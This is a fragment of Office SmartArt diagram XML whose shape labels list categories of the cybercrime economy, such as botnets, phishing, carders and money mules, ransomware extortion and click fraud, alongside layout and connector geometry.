      <dsp:txXfrm>
        <a:off x="9123889" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A20E9766-61CD-4711-B99D-41622BFCA782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7605839"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F22F3-AC19-46C9-A82F-89D8DB189CE8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7743958"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Click Fraud and Ad Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7767077" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9125158"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3FE0F9-C0AD-41ED-8499-585D4FDF8177}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9263278"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Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9286397" y="3320040"/>
        <a:ext cx="1196841" cy="7431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BD6A2-C6A6-4AE7-8716-F62AC787B4F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="1616471" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471"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CAA67D-ED33-4120-9634-DF98516FB005}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="97152" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152"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B922D2-A971-46B6-8A66-A63871EC5D71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="2876130" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2876130" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="287613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64DF9C-47B4-4930-BF8C-FB83C56F57E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="1429867" cy="433494"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="433494"/>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97DC07-675E-4CF3-9913-C7CB3E6FE0DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6545551" y="3955063"/>
          <a:ext cx="162507" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="162507" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="162507"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3BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5026232" y="3955063"/>
          <a:ext cx="1681827" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1681827" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1681827"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DC0BED-9251-4B5C-8191-EE587DFF262E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3506912" y="3955063"/>
          <a:ext cx="3201146" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3201146" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3201146"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8E46D9-FBC5-4AA6-9A5D-86A5A084592D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="2645968"/>
          <a:ext cx="1422167" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1422167" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1422167"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B06ADF-5D22-4867-A9A8-3ACC6EA49E1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5188740" y="2645968"/>
          <a:ext cx="2941486" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="2941486" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="2941486"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D2CCC9-A5CD-45F3-BA34-8716B2A7CFB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3669420" y="2645968"/>
          <a:ext cx="4460805" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="4460805" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="4460805"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159A7B-5084-481D-94B7-435977B6A330}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1572976" y="3955063"/>
          <a:ext cx="577124" cy="450386"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="577124" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="577124" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="335229"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="450386"/>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1BCCB0-2588-4D93-98C8-3D49C52437B6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2150101" y="2645968"/>
          <a:ext cx="5980125" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="5980125" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="5980125"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EDCBD1-A1A5-439E-8E90-B317445DC7F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="630781" y="2645968"/>
          <a:ext cx="7499444" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="7499444" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="7499444"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3B26D2-9048-4DFE-9E37-9E8A6613E98D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8084506" y="1495084"/>
          <a:ext cx="91440" cy="361528"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="361528"/>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1B31C6-CC49-4888-BF15-7D36EC2364E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7174466" y="705728"/>
          <a:ext cx="1911520"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D6E11A-7365-4E7C-A174-08A7BBA7C802}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7312586" y="836942"/>
          <a:ext cx="1911520"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Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7335705" y="860061"/>
        <a:ext cx="1865282" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F02E4111-56B6-4851-B9BF-62C394FB9F4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7508686" y="185661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C837EB-A120-4D0E-8C3A-E5BD7C1394E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7646806" y="198782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Botnets</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7669925" y="2010946"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F042C109-58FD-4EC0-A229-3030AD4E6457}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9242"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762C1A-05A0-4F4D-9899-D4D3AACE82D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="147362"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Stolen Account Credentials</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="170481" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A91D7A60-2849-4955-85BF-A221EF3D6555}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1528561"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79D77-7F05-4916-BFF3-E71C68B238E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1666681"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Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1689800" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0ABA8841-2E13-4EE7-9600-D939414EE2BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="951437" y="4405450"/>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7F7E9-9C03-4C4C-9760-95BB29039A01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1089557" y="4536664"/>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Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1112676" y="4559783"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D25DF860-47FD-42F0-B603-5671C9C185E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3047880"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C6BE09-6C35-45D2-A751-D4BF107EE4F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3186000"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DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3209119" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2EBA7DD-B67B-4866-B7D0-1EDF7294D4EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4567200"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87343F-C488-4AC1-A4FD-C02C38DCC47B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4705320"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Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4728439" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6086519"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B2796D-E837-4404-9852-61F32C250BFA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6224639"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Spam</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6247758" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{47F209D6-A50F-4593-8101-495466DA161C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2885373"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17AD6-2A5A-4CC4-817B-C33D1FB1B247}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3023493"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Phishing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3046612" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4404692"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825871-887C-4144-92E4-0CD1C779523E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4542812"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Pharma</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4565931" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5924011"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9CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6062131"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Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6085250" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7516387" y="4388557"/>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75C67-9F60-4DCF-8A09-6EBB5AA047F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7654506" y="451977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Fake Anti-virus</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7677625" y="4542890"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8962650"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493045-F4D0-49BB-8749-0235A8D3915E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9100770"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Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9123889" y="4540696"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A20E9766-61CD-4711-B99D-41622BFCA782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7605839"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F22F3-AC19-46C9-A82F-89D8DB189CE8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7743958"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Click Fraud and Ad Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7767077" y="3320040"/>
        <a:ext cx="1196841" cy="743117"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9125158"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3FE0F9-C0AD-41ED-8499-585D4FDF8177}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9263278"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Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9286397" y="3320040"/>
        <a:ext cx="1196841" cy="7431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BD6A2-C6A6-4AE7-8716-F62AC787B4F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="1616471" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1616471"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CAA67D-ED33-4120-9634-DF98516FB005}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8130226" y="2645968"/>
          <a:ext cx="97152" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152" y="404581"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="97152"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B922D2-A971-46B6-8A66-A63871EC5D71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="2876130" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2876130" y="316142"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="287613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64DF9C-47B4-4930-BF8C-FB83C56F57E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="3955063"/>
          <a:ext cx="1429867" cy="433494"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="318336"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1429867" y="433494"/>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97DC07-675E-4CF3-9913-C7CB3E6FE0DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6545551" y="3955063"/>
          <a:ext cx="162507" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="162507" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="162507"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3BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5026232" y="3955063"/>
          <a:ext cx="1681827" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1681827" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1681827"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DC0BED-9251-4B5C-8191-EE587DFF262E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3506912" y="3955063"/>
          <a:ext cx="3201146" cy="431300"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3201146" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3201146"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8E46D9-FBC5-4AA6-9A5D-86A5A084592D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6708059" y="2645968"/>
          <a:ext cx="1422167" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1422167" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1422167"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B06ADF-5D22-4867-A9A8-3ACC6EA49E1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5188740" y="2645968"/>
          <a:ext cx="2941486" cy="519739"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
